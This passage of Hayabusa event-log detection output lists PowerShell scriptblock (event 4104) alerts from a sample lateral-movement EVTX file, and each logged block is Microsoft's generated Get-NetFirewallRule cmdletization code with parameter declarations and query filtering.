${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 